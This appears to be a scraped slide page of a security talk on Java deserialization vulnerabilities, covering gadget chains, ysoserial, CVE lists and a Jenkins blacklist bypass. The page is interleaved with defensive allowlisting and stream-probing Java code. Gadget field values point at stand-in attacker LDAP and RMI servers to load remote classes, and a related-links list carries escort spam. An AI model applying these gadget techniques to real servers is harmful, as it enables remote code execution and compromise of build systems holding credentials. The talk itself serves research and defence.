Java Deserialization Vulnerabilities
– The Forgotten Bug Class
Matthias Kaiser
(@matthias_kaiser)
About me
- Head of Vulnerability Research at Code White in Ulm, Germany
- Dev for a defense company in the past
- Spent a lot of time on (server-side) Java Security
- Found bugs in products of Oracle, VMware, IBM, SAP, Symantec, Apache, Adobe, HP, etc.
- Recently looking more into the Windows world and client-side stuff
@matthias_kaiser
11.11.2016 2
Agenda
- Introduction
- Java's Object Serialization
- What's the problem with it
- A history of bugs
- Finding and exploiting
- Code White's bug parade
- A hands-on example
- More to come?
Should you care?
- If your client is running server products of [vendor logos not extracted] you SHOULD!
Some facts
- The bug class has existed for more than 10 years
- Most ignored bug class in the server-side Java world until 2015
- An easy way to get reliable RCE on a server
- Architecture-independent exploitation
- With Java deserialization vulnerabilities you can pwn a corp easily!
Where is it used
- Several J2EE/JEE core technologies rely on serialization
  - Remote Method Invocation (RMI)
  - Java Management Extension (JMX)
  - Java Message Service (JMS)
  - Java Server Faces implementations (ViewState)
- Communication between JVMs in general (because devs are lazy :-)
- Custom application protocols running on top of HTTP, etc.
What is serialization?
[Diagram: an Object is turned into a stream of bytes (serialization), stored in a File, sent over the Network or written to a Database, and the stream of bytes is turned back into an Object (deserialization)]
Overview of Java’s Object Serialization Protocol
[Diagram of a serialized object: the stream Magic, then TC_OBJECT, then TC_CLASSDESC carrying the class description info (class name, field type, class field), then the classdata[]]
There is a protocol spec and a grammar:
https://docs.oracle.com/javase/8/docs/platform/serialization/spec/protocol.html
Deserializing an object
What could possibly go wrong here?
What’s the problem
- ObjectInputStream doesn't include validation features in its API
- All serializable classes that the current classloader can locate and load can get deserialized
- Although a class cast exception might occur in the end, the object will be created!
What’s the problem #2
- A developer can customize the (de)serialization of a serializable class
  - Implement methods writeObject(), writeReplace(), readObject() and readResolve()
- ObjectInputStream invokes readObject() and readResolve(): under our control!
What’s the problem #3
- Further methods can be triggered by using certain classes as a "trampoline"
  - Object.toString() using e.g. javax.management.BadAttributeValueExpException
  - Object.hashCode() using e.g. java.util.HashMap
  - Comparator.compare() using e.g. java.util.PriorityQueue
  - etc.
[Diagram: Trampoline class -> Target class]
What’s the problem #3
javax.management.BadAttributeValueExpException.readObject():
1. Reading the field "val"
2. Calling "toString()" on "val"
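The countermeasure that follows from the three "What's the problem" slides, as an added example that is not from the talk: an ObjectInputStream subclass that checks an allowlist in resolveClass(), which runs while the TC_CLASSDESC is read, so a stream naming a class such as javax.management.BadAttributeValueExpException is refused before any instance exists and before readObject()/readResolve() or the toString() trampoline can run. AllowlistObjectInputStream, BuildStatus and the allowlist contents are constructed for this example.

```java
import java.io.*;
import java.util.*;

/**
 * "Look-ahead" ObjectInputStream: resolveClass() is consulted for every class
 * descriptor before the class is instantiated, so a class that is not on the
 * allowlist is rejected before its readObject()/readResolve() or any trampoline
 * (toString(), hashCode(), compare()) can fire. Constructed for this example.
 */
public class AllowlistObjectInputStream extends ObjectInputStream {

    private final Set<String> allowed;

    public AllowlistObjectInputStream(byte[] data, Set<String> allowed) throws IOException {
        super(new ByteArrayInputStream(data));
        this.allowed = allowed;
    }

    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
        String name = desc.getName();
        if (!allowed.contains(elementType(name))) {
            throw new InvalidClassException(name, "not on the deserialization allowlist");
        }
        return super.resolveClass(desc);
    }

    /** Dynamic proxies (InvocationHandler implementations) are a gadget source of their own: refuse them. */
    @Override
    protected Class<?> resolveProxyClass(String[] interfaces) throws IOException, ClassNotFoundException {
        throw new InvalidClassException(String.join(",", interfaces), "dynamic proxies are not accepted");
    }

    /** "[[Lfoo.Bar;" -> "foo.Bar", "[I" -> "int": arrays are judged by their element type. */
    static String elementType(String name) {
        int dims = 0;
        while (dims < name.length() && name.charAt(dims) == '[') dims++;
        String rest = name.substring(dims);
        if (dims == 0) return rest;
        if (rest.startsWith("L") && rest.endsWith(";")) return rest.substring(1, rest.length() - 1);
        switch (rest) {
            case "B": return "byte";  case "C": return "char";    case "I": return "int";   case "J": return "long";
            case "S": return "short"; case "Z": return "boolean"; case "F": return "float"; case "D": return "double";
            default:  return name;
        }
    }

    /** Stock serialization, used here only to build the constructed sample streams. */
    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    static Object deserialize(byte[] data, Set<String> allowed) throws IOException, ClassNotFoundException {
        try (AllowlistObjectInputStream ois = new AllowlistObjectInputStream(data, allowed)) {
            return ois.readObject();
        }
    }

    /** Constructed message type: the only thing this endpoint is supposed to receive. */
    static final class BuildStatus implements Serializable {
        private static final long serialVersionUID = 1L;
        final String job;
        final int number;
        BuildStatus(String job, int number) { this.job = job; this.number = number; }
    }

    public static void main(String[] args) throws Exception {
        Set<String> allowed = Collections.singleton(BuildStatus.class.getName());

        BuildStatus ok = (BuildStatus) deserialize(serialize(new BuildStatus("core", 42)), allowed);
        System.out.println("accepted: " + ok.job + " #" + ok.number);

        // The toString() trampoline class from the slides, serialized with a harmless String as "val".
        // With the allowlist its class descriptor is refused before the object is even created.
        byte[] trampoline = serialize(new javax.management.BadAttributeValueExpException("harmless"));
        try {
            deserialize(trampoline, allowed);
            System.out.println("BUG: trampoline class was accepted");
        } catch (InvalidClassException e) {
            System.out.println("rejected before instantiation: " + e.getMessage());
        }
    }
}
```

Since JDK 8u121 and JDK 9 the same policy can be expressed without subclassing through ObjectInputFilter (the serialFilter mechanism); the subclass form works on every JRE the talk covers.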
History of Java deserialization vulnerabilities
- 2006: JRE vulnerabilities (DoS), Mark Schönefeld
- 2008: JSF ViewState XSS/DoS in Sun Java Web Console, Luca Carettoni
- 2011: CVE-2011-2894 Spring Framework RCE, Wouter Coekaerts
- 2012: CVE-2012-4858 IBM Cognos Business Intelligence RCE, Pierre Ernst
History of Java deserialization vulnerabilities
- 2013: CVE-2013-1768 Apache OpenJPA RCE, CVE-2013-1777 Apache Geronimo 3 RCE, CVE-2013-2186 Apache commons-fileupload RCE, Pierre Ernst
- 2013: CVE-2013-2165 JBoss RichFaces RCE, Takeshi Terada
- 2015: CVE-2015-3253 Groovy RCE, CVE-2015-7501 Commons-Collections RCE, Gabriel Lawrence and Chris Frohoff
#JavaDeser is the new hotness …
Finding is trivial
- Do the "grep" thing on "readObject()"
- Use an IDE like IntelliJ or Eclipse and trace the call paths to ObjectInputStream.readObject()
Exploitation
- Exploitation requires a chain of serialized objects triggering interesting functionality, e.g.
  - writing files
  - dynamic method calls using Java's Reflection API
  - etc.
- For such a chain the term "gadget" got established
- Chris Frohoff and others found several gadgets in standard libs
Javassist/Weld Gadget
- Gadget utilizes JBoss' Javassist and Weld framework
- Reported to Oracle with the Weblogic T3 vulnerability
- Works in Oracle Weblogic and JBoss EAP
- Allows us to call a method on a deserialized object
"Return of the Rhino"-Gadget
- Gadget utilizes Mozilla's Rhino Script Engine
- Works with the latest Rhino in the classpath
- Oracle applied some hardening to its Rhino version
  - So it only works with Oracle JRE <= jre7u13 :(
  - Works with the latest openjdk7-JRE (e.g. on Debian, Ubuntu) :)
- Allows us to call a method on a deserialized object
- JRE gadget :)
What to look for?
- Look for methods in serializable classes
  - working on files
  - triggering reflection (invoking methods, getting/setting properties on beans)
  - doing native calls
  - etc.
  AND being called from
  - readObject()
  - readResolve()
  - toString()
  - hashCode()
  - finalize()
  - any other method being called from a "Trampoline" class
What to look for?
- Look at serializable classes used in Java reflection proxies
  - java.lang.reflect.InvocationHandler implementations
  - javassist.util.proxy.MethodHandler implementations
[Diagram: a call to toString() on a Proxy is routed to the InvocationHandler interface as invoke(target, toString, args), where the handler can do something else]
What to look for?
[Code screenshot: an InvocationHandler whose invoke() prints out the method being called]
What to look for?
What if InvocationHandler.invoke() does "insecure stuff" using values from the serialized object input stream?
[Diagram: Proxy]
Making gadget search easier
- Chris Frohoff released a tool for finding gadgets using a graph database
- Using object graph queries for gadget search
Exploitation tricks
- Adam Gowdiak's TemplatesImpl
  - com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl is serializable
  - Allows you to define new classes from your byte[][]
  - Calling TemplatesImpl.newTransformer() on the deserialized object -> code execution
Exploitation tricks
- InitialContext.lookup()
  - @benmmurphy used it for a sandbox escape (CVE-2013-5830)
  - @zerothoughts published a gadget in Spring's JtaTransactionManager recently
    - Triggers InitialContext.lookup(jndiName)
    - Uses "rmi://yourFakeRmiServer/Object" as jndiName
    - Loads classes from your fake RMI server
  - Calling JdbcRowSetImpl.execute() on a deserialized object will do the same :)
Payload generation
- Chris Frohoff released the great tool "ysoserial"
- Makes creation of payloads easy
- Includes gadgets for
  - Commons Collections 3 & 4
  - Spring
  - Groovy
  - JRE7 (<= jre7u21)
  - Commons BeanUtils
  - and even more!
Custom payloads
- I wouldn't go for Runtime.getRuntime().exec(cmd) for several reasons
- Most of the gadgets don't touch the disk :)
- With scripting languages your life gets even easier
- Use what's in the classpath
  - Javascript (Rhino, Nashorn)
  - Groovy
  - Beanshell
  - etc.
Code White’s Bug Parade #1
- CVE-2015-6554 - Symantec Endpoint Protection Manager RCE
- CVE-2015-6576 - Atlassian Bamboo RCE
- CVE-2015-7253 - Commvault Edge Server RCE
- CVE-2015-7253 - Apache ActiveMQ RCE
- CVE-2015-4582 - Oracle Weblogic RCE
- CVE-2016-1998 - HP Service Manager RCE
- CVE-2016-2173 - Spring AMQP RCE
- CVE-2016-3493 - Oracle Hyperion RCE
- CVE-2016-3551 - Oracle Weblogic RCE
Code White’s Bug Parade #2
- NOT-FIXED - IBM WebSphere MQ JMS client RCE
- NOT-FIXED - IBM WebSphere JMS client RCE
- NOT-FIXED - Pivotal RabbitMQ JMS client RCE
- NOT-FIXED - Oracle OpenMQ JMS client RCE
- CVE-2016-4978 - Apache ActiveMQ Artemis JMS client RCE
- CVE-2016-4974 - Apache Qpid client/JMS client RCE
- CVE-2016-0638 - Oracle Weblogic JMS client RCE
- FIXED-NO-CVE - IIT Software SwiftMQ JMS client RCE
- MAYBE-FIX - Amazon SQS Java Messaging RCE
- WONT-FIX - JBoss HornetQ JMS client RCE
A hands-on example: Jenkins
Jenkins
- Open Source Automation Server / Continuous Integration Server / "Build" Server
- Created by Kohsuke Kawaguchi (ex-Oracle, now CTO of CloudBees)
- Fork of Oracle's Hudson CI server
- Supports Subversion, Git, Mercurial, etc.
- Runs Maven, Ant, etc.
- More than 1200 plugins! (see https://updates.jenkins-ci.org/download/plugins/)
Jenkins
- Nice target because Jenkins
  - has access to source code repositories
  - creates deployment artefacts (Jar, War, Ear, etc.)
  - can deploy artefacts on target servers
  - stores credentials (user/password, SSH keys)
Jenkins Internals
- Jenkins uses an extra port for the Command Line Interface (CLI)
- Can be configured to a fixed or random port
Jenkins Internals
- Jenkins uses its own RMI-style protocol for its Command Line Interface (CLI)
- Base64-encoded serialized objects (rO0 -> 0xac,0xed)
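An added example, not from the talk or from Jenkins, that applies the protocol overview slide and the rO0 hint above: a probe that decodes the Base64 form if present, validates the stream magic and version, and walks only the TC_CLASSDESC chain of the top-level TC_OBJECT, so a reverse proxy or IDS rule can log which class a client is sending to an endpoint without ever instantiating it. SerialStreamProbe is a constructed name, and the sample stream is built in main() by serializing an empty HashMap with the stock ObjectOutputStream.

```java
import java.io.*;
import java.nio.charset.StandardCharsets;
import java.util.*;

/**
 * Reads only the head of a Java Object Serialization stream: magic and version, then the
 * TC_CLASSDESC chain of the top-level TC_OBJECT. Enough for a reverse proxy or IDS rule to
 * answer "is this a serialized object, and of which class?" without instantiating anything.
 */
public class SerialStreamProbe {
    static final int STREAM_MAGIC = 0xACED, STREAM_VERSION = 5;
    static final int TC_NULL = 0x70, TC_REFERENCE = 0x71, TC_CLASSDESC = 0x72, TC_OBJECT = 0x73,
            TC_STRING = 0x74, TC_ENDBLOCKDATA = 0x78, TC_PROXYCLASSDESC = 0x7D;

    /** Base64 of 0xAC 0xED 0x00 0x05 always starts with "rO0AB": decode that form, pass raw bytes through. */
    static byte[] unwrap(byte[] data) {
        if (data.length >= 5 && new String(data, 0, 5, StandardCharsets.US_ASCII).equals("rO0AB")) {
            return Base64.getDecoder().decode(new String(data, StandardCharsets.US_ASCII).trim());
        }
        return data;
    }

    /** Class name chain (class, superclass, ...) of the top-level object, most-derived first. */
    static List<String> topLevelClasses(byte[] data) throws IOException {
        DataInputStream in = new DataInputStream(new ByteArrayInputStream(unwrap(data)));
        if (in.readUnsignedShort() != STREAM_MAGIC || in.readUnsignedShort() != STREAM_VERSION) {
            throw new IOException("not a Java serialization stream (magic/version mismatch)");
        }
        int tc = in.readUnsignedByte();
        if (tc != TC_OBJECT) throw new IOException(String.format("top-level content is 0x%02x, not TC_OBJECT", tc));
        List<String> chain = new ArrayList<>();
        readClassDesc(in, chain);
        return chain;
    }

    /** classDesc: TC_CLASSDESC className serialVersionUID classDescInfo | TC_PROXYCLASSDESC ... | TC_NULL | TC_REFERENCE */
    static void readClassDesc(DataInputStream in, List<String> chain) throws IOException {
        int tc = in.readUnsignedByte();
        switch (tc) {
            case TC_NULL:                    // end of the superclass chain
                return;
            case TC_REFERENCE:               // back-reference (int handle) to a descriptor already read
                in.readInt();
                return;
            case TC_PROXYCLASSDESC: {        // (int)<count> proxyInterfaceName[count] classAnnotation superClassDesc
                int count = in.readInt();
                for (int i = 0; i < count; i++) chain.add("proxy:" + in.readUTF());
                skipAnnotation(in);
                readClassDesc(in, chain);
                return;
            }
            case TC_CLASSDESC: {
                String name = in.readUTF();  // className
                in.readLong();               // serialVersionUID
                in.readByte();               // classDescFlags (SC_SERIALIZABLE, SC_WRITE_METHOD, ...)
                int fields = in.readShort();
                for (int i = 0; i < fields; i++) {
                    int typecode = in.readUnsignedByte();
                    in.readUTF();            // fieldName
                    if (typecode == 'L' || typecode == '[') readFieldClassName(in);
                }
                skipAnnotation(in);
                chain.add(name);
                readClassDesc(in, chain);    // superClassDesc
                return;
            }
            default:
                throw new IOException(String.format("unexpected type code 0x%02x in class descriptor", tc));
        }
    }

    /** className1 of an object or array field: TC_STRING (utf) or TC_REFERENCE (handle). */
    static void readFieldClassName(DataInputStream in) throws IOException {
        int tc = in.readUnsignedByte();
        if (tc == TC_STRING) in.readUTF();
        else if (tc == TC_REFERENCE) in.readInt();
        else throw new IOException("malformed field class name");
    }

    /** classAnnotation: the stock ObjectOutputStream writes none; RMI's MarshalOutputStream writes a codebase String or null. */
    static void skipAnnotation(DataInputStream in) throws IOException {
        for (int tc = in.readUnsignedByte(); tc != TC_ENDBLOCKDATA; tc = in.readUnsignedByte()) {
            if (tc == TC_STRING) in.readUTF();
            else if (tc != TC_NULL) throw new IOException("unsupported class annotation");
        }
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample: an empty HashMap serialized with the stock ObjectOutputStream, probed raw and Base64-encoded.
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(new HashMap<String, String>());
        }
        byte[] raw = bos.toByteArray();
        byte[] b64 = Base64.getEncoder().encode(raw);
        System.out.println("base64 prefix : " + new String(b64, 0, 5, StandardCharsets.US_ASCII));
        System.out.println("raw stream    : " + topLevelClasses(raw));
        System.out.println("base64 stream : " + topLevelClasses(b64));
    }
}
```

The probe stops after the descriptor chain on purpose: the classdata[] that follows is where custom readObject() logic starts, and a filter that only needs the class name has no reason to parse further.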
Jenkins under Attack
- Jenkins CLI endpoint suffered from several vulnerabilities
  - CVE-2015-8103 of Steven Breen using the Commons Collections gadget
  - Jenkins introduced a blacklist to filter gadget classes
  - CVE-2016-0788 of Moritz Bechler bypassing the blacklist (see ERNW blog post https://insinuator.net/2016/07/jenkins-remoting-rce-ii-the-return-of-the-ysoserial/)
- As we all know blacklisting is hard because you never know …
Jenkins’ Blacklist
Finding a blacklist filter bypass
- How to bypass a gadget blacklist filter?
  a) Find a new gadget
  b) Find a bypass gadget (see Alvaro's and Christian's research)
  c) Look for a partially fixed gadget
- After looking at all gadgets of ysoserial and matching them with Jenkins' third-party libs and the blacklist, I found one interesting gadget discovered by Moritz Bechler:
The JSON1 gadget
- "Code execution step": filtered by blacklist :(
- "Trigger step": invokes all "getter" methods on a serialized object; not filtered by blacklist :)
- "Init step"
Finding a blacklist filter bypass #1
- Initial idea was to use the JDBCRowSetImpl trick as the code execution step
- "Getter" methods trigger the JNDI call:
- But net.sf.json.JSONObject.containsValue(JDBCRowSetImpl instance) fails because several "getter" methods trigger exceptions :(
Finding a blacklist filter bypass #2
- Next idea was to look for other serializable classes with "getter" methods leading to code execution
- Recent research FTW:
Finding a blacklist filter bypass #2
- JNDI lookups can lead to RCE (see JDBCRowSetImpl)
  - Exploitation using RMI, LDAP and CORBA
- LDAP queries can lead to RCE
  - LDAP server needs to be under your control
  - data from the LDAP response is deserialized using ObjectInputStream
  - data (URLs) from the LDAP response is used to load classes using URLClassLoader -> RCE
- I found some nice classes in package "com.sun.jndi.ldap"
  - One of them is the serializable class "com.sun.jndi.ldap.LdapAttribute"
com.sun.jndi.ldap.LdapAttribute
[Code screenshot, annotated with the fields that matter in the serialized object:]
- baseCtxURL=ldap://attacker:port
- rdn="dc=whatever"
Putting it all together for the new JSON2 gadget
- With LdapAttribute.getAttributeDefinition() we get code execution using a custom LDAP server
- The "Init step" shown before doesn't work, so we need something else :(
- By using Eclipse an alternative code path can easily be found :)
Some "updates" with regards to exploitation …
- Previous research only mentioned the CLI port!
- If you have Jenkins running on the internet behind a firewall / reverse proxy, you can't connect
- But the Jenkins Wiki has some hidden gems for us:

Connection mechanism
1. Jenkins CLI clients and Jenkins server establish the communication in the following fashion. Jenkins listens on a TCP/IP port configured under "TCP port for JNLP agents" in the system configuration page. This single port is used for both agents and CLI.
…
5. If that fails (for example, if there's a reverse proxy and Jenkins runs on a different host, or if a firewall blocks access to this TCP/IP port), or if the header is not found, it will fall back to the communication mechanism that uses two simultaneous HTTP connections.
Jenkins CLI HTTP "fallback"
- HTTP Connection #1
  - Server -> Client channel
  - Client reads from InputStream
  - UUID as identifier
  - Blocks until #2 connects
- HTTP Connection #2
  - Client -> Server channel
  - Client writes to OutputStream
  - UUID as identifier
DEMO: Jenkins 2.19.2 LTS
Conclusion
- Java deserialization is no rocket science
- Finding bugs is trivial, exploitation takes more
- So many products affected by it
- Research has started, again …
- This will never end!
Q&A
 
What is Binary Language? Computer Number Systems
What is Binary Language?  Computer Number SystemsWhat is Binary Language?  Computer Number Systems
What is Binary Language? Computer Number Systems
 
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi đŸĢĻ HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱  9999965857  🤩 Delhi đŸĢĻ HOT AND SEXY VVIP 🍎 SE...Call Girls In Mukherjee Nagar 📱  9999965857  🤩 Delhi đŸĢĻ HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi đŸĢĻ HOT AND SEXY VVIP 🍎 SE...
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered Sustainability
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
 
Professional Resume Template for Software Developers
Professional Resume Template for Software DevelopersProfessional Resume Template for Software Developers
Professional Resume Template for Software Developers
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)
 
Russian Call Girls in Karol Bagh Aasnvi ➡ī¸ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡ī¸ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡ī¸ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡ī¸ 8264348440 💋📞 Independent Escort S...
 

Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)

  • 1. Java Deserialization Vulnerabilities – The Forgotten Bug Class
    Matthias Kaiser (@matthias_kaiser)
  • 2. About me
    - Head of Vulnerability Research at Code White in Ulm, Germany
    - Dev for a defense company in the past
    - Spent a lot of time on (server-side) Java Security
    - Found bugs in products of Oracle, VMware, IBM, SAP, Symantec, Apache, Adobe, HP, etc.
    - Recently looking more into the Windows world and client-side stuff
    @matthias_kaiser 11.11.2016 2
  • 3. Agenda
    - Introduction
    - Java’s Object Serialization
    - What’s the problem with it
    - A history of bugs
    - Finding and exploiting
    - Code White’s bug parade
    - A hands-on example
    - More to come?
  • 4. Should you care?
    - If your client is running server products of you SHOULD!
  • 5. Some facts
    - The bug class has existed for more than 10 years
    - Most ignored bug class in the server-side Java world until 2015
    - An easy way to get reliable RCE on a server
    - Architecture-independent exploitation
    - With Java deserialization vulnerabilities you can pwn a corp easily!
  • 6. Where is it used
    - Several J2EE/JEE core technologies rely on serialization
      - Remote Method Invocation (RMI)
      - Java Management Extension (JMX)
      - Java Message Service (JMS)
      - Java Server Faces implementations (ViewState)
    - Communication between JVMs in general (because devs are lazy :-)
    - Custom application protocols running on top of HTTP, etc.
  • 7. What is serialization?
    [Diagram: Object → Serialization → Stream of bytes → File / Network / Database → Stream of bytes → Deserialization → Object]
  • 8. Overview of Java’s Object Serialization Protocol
    [Diagram of the stream layout: Magic, TC_OBJECT, TC_CLASSDESC, class description info (class name, field type, class field), classdata[]]
  • 9. There is a protocol spec and a grammar
    https://docs.oracle.com/javase/8/docs/platform/serialization/spec/protocol.html
  • 10. Deserializing an object
    What could possibly go wrong here?
  • 11. What’s the problem
    - ObjectInputStream doesn’t include validation features in its API
    - All serializable classes that the current classloader can locate and load can get deserialized
    - Although a class cast exception might occur in the end, the object will be created!
  • 12. What’s the problem #2
    - A developer can customize the (de)serialization of a serializable class
    - Implement the methods writeObject(), writeReplace(), readObject() and readResolve()
    - ObjectInputStream invokes readObject() and readResolve(): under our control!
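As an added example (not code from the talk or from any product it names), the following Java program shows both halves of slides 11 and 12 from the defender's side: a serializable class whose readObject() hook runs as soon as its bytes are read, and a "look-ahead" ObjectInputStream subclass that rejects every class not on an explicit allowlist before an instance is created. The class names AuditRecord and LookAheadObjectInputStream and the allowlist contents are invented for this example.

```java
import java.io.*;
import java.util.*;

// Added example (not from the talk): a serializable class whose readObject()
// runs application logic during deserialization, plus a look-ahead
// ObjectInputStream that only admits an explicit allowlist of classes.
public class LookAheadDemo {

    // Hypothetical application class. Its readObject() hook runs before the
    // caller ever sees (or casts) the object, which is the point of slide 12.
    static class AuditRecord implements Serializable {
        private static final long serialVersionUID = 1L;
        String message;
        AuditRecord(String message) { this.message = message; }

        private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
            in.defaultReadObject();
            // Any code here executes on the receiving JVM, driven purely by the bytes.
            System.out.println("readObject() ran for AuditRecord: " + message);
        }
    }

    // Allowlisting stream: resolveClass() is called for each TC_CLASSDESC
    // before the instance is created, so unknown classes are rejected
    // before any readObject()/readResolve() of theirs can run.
    static class LookAheadObjectInputStream extends ObjectInputStream {
        private final Set<String> allowed;

        LookAheadObjectInputStream(InputStream in, Set<String> allowed) throws IOException {
            super(in);
            this.allowed = allowed;
        }

        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc)
                throws IOException, ClassNotFoundException {
            if (!allowed.contains(desc.getName())) {
                throw new InvalidClassException(desc.getName(), "Unauthorized deserialization attempt");
            }
            return super.resolveClass(desc);
        }

        // Dynamic proxies carry interface names instead of a class descriptor;
        // reject them as well so InvocationHandler implementations (slide 24)
        // cannot be reached through a Proxy.
        @Override
        protected Class<?> resolveProxyClass(String[] interfaces)
                throws IOException, ClassNotFoundException {
            throw new InvalidClassException("Proxy classes are not allowed: " + Arrays.toString(interfaces));
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    static Object deserialize(byte[] bytes, Set<String> allowed) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new LookAheadObjectInputStream(new ByteArrayInputStream(bytes), allowed)) {
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        byte[] bytes = serialize(new AuditRecord("hello"));
        // The stream starts with the magic 0xAC 0xED (the "rO0" of slide 40 once base64-encoded).
        System.out.printf("magic: %02x %02x%n", bytes[0], bytes[1]);

        // 1) Plain ObjectInputStream: readObject() of AuditRecord runs unconditionally.
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            ois.readObject();
        }

        // 2) Allowlist that does NOT contain AuditRecord: rejected in resolveClass(),
        //    before the instance exists and before its readObject() hook can run.
        try {
            deserialize(bytes, Collections.singleton("java.lang.String"));
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }

        // 3) Allowlist that names exactly the expected class: accepted.
        Object o = deserialize(bytes, Collections.singleton(AuditRecord.class.getName()));
        System.out.println("accepted: " + ((AuditRecord) o).message);
    }
}
```

resolveClass() is invoked for every class descriptor in the stream, including serializable superclasses, so the allowlist has to name the whole descriptor chain of each expected type. This subclass approach works on any Java version; the ObjectInputFilter API added with JEP 290 (Java 9, backported to 8u121) offers the same check without subclassing.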
  • 13. What’s the problem #3
    - Further methods can be triggered by using certain classes as a "trampoline"
      - Object.toString() using e.g. javax.management.BadAttributeValueExpException
      - Object.hashCode() using e.g. java.util.HashMap
      - Comparator.compare() using e.g. java.util.PriorityQueue
      - etc.
    [Diagram: Trampoline class → Target class]
  • 14. What’s the problem #3
    javax.management.BadAttributeValueExpException
    1. Reading the field "val"
    2. Calling "toString()" on "val"
  • 15. History of Java deserialization vulnerabilities
    - 2006: JRE vulnerabilities (DoS), Marc Schönefeld
    - 2008: JSF ViewState XSS/DoS, Sun Java Web Console, Luca Carettoni
    - 2011: CVE-2011-2894 Spring Framework RCE, Wouter Coekaerts
    - 2012: CVE-2012-4858 IBM Cognos Business Intelligence RCE, Pierre Ernst
  • 16. History of Java deserialization vulnerabilities
    - 2013: CVE-2013-1768 Apache OpenJPA RCE; CVE-2013-1777 Apache Geronimo 3 RCE; CVE-2013-2186 Apache commons-fileupload RCE, Pierre Ernst
    - 2013: CVE-2013-2165 JBoss RichFaces RCE, Takeshi Terada
    - 2015: CVE-2015-3253 Groovy RCE; CVE-2015-7501 Commons-Collections RCE, Gabriel Lawrence and Chris Frohoff
  • 17. #JavaDeser is the new hotness …
  • 18. Finding is trivial
    - Do the "grep" thing on "readObject()"
  • 19. Finding is trivial
    - Use an IDE like IntelliJ or Eclipse and trace the call paths to ObjectInputStream.readObject()
  • 20. Exploitation
    - Exploitation requires a chain of serialized objects triggering interesting functionality, e.g.
      - writing files
      - dynamic method calls using Java’s Reflection API
      - etc.
    - For such a chain the term "gadget" got established
    - Chris Frohoff and others found several gadgets in standard libs
  • 21. Javassist/Weld Gadget
    - Gadget utilizes JBoss’ Javassist and Weld framework
    - Reported to Oracle with the WebLogic T3 vulnerability
    - Works in Oracle WebLogic and JBoss EAP
    - Allows us to call a method on a deserialized object
  • 22. "Return of the Rhino" Gadget
    - Gadget utilizes the Rhino Script Engine of Mozilla
    - Works with the latest Rhino in the classpath
    - Oracle applied some hardening to its Rhino version
      - So it only works with Oracle JRE <= jre7u13 :(
      - Works with the latest openjdk7-JRE (e.g. on Debian, Ubuntu) :)
    - Allows us to call a method on a deserialized object
    - JRE Gadget :)
  • 23. What to look for?
    - Look for methods in serializable classes
      - working on files
      - triggering reflection (invoking methods, getting/setting properties on beans)
      - doing native calls
      - etc.
    AND being called from
      - readObject()
      - readResolve()
      - toString()
      - hashCode()
      - finalize()
      - any other method being called from a "Trampoline" class
  • 24. What to look for?
    - Look at serializable classes used in Java reflection proxies
      - java.lang.reflect.InvocationHandler implementations
      - javassist.util.proxy.MethodHandler implementations
